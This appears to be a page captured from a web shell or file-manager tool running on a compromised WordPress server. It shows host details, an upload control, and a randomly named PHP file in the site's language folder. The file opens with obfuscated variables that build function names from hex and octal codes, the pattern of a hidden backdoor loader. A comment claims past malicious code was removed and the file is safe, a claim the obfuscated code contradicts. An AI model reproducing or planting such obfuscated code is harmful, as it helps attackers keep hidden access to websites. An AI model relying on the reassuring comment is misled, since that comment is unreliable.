HEX
Server: Apache
System: Linux server-674799.igrow.ws 5.14.0-611.27.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Feb 4 04:40:11 EST 2026 x86_64
User: elrashedytravel (1025)
PHP: 8.1.34
Disabled: exec,passthru,shell_exec,system
Upload Files
File: /home/elrashedytravel/www/wp-content/languages/top-1767953067.php
<!--yQTxWUZr-->
<?php
 $_²¹¯Ð¹•“="7\x33";$_˜·¹ŽÅ="6\x35";$_ьˇɤߙ”Œ="\066d";$_Šßۊ²¶•Ý="6c";$_‹¹‚–Ó="63";$_¬Ú”˜·²="\x378";$_ډÇÏÐ="\067\060";$_’£¡ˆÎϑŽÑÉ="\x368";$_פÕÕ®="74";$_ƛ͎Œ×؉µÓ="72";$_ÐÓ֊®²¦«="61";$_Ç̈ײ="5f";$_̒“›¨Éݲݎ="6\146";$_—Üûʊ«="6\071";$_ˆÝ¬¶–ÖÜ="67";$_À· ­ÆÝ› ="6\145";
/**
* Note: This file may contain artifacts of previous malicious infection.
* However, the dangerous code has been removed, and the file is now safe to use.
*/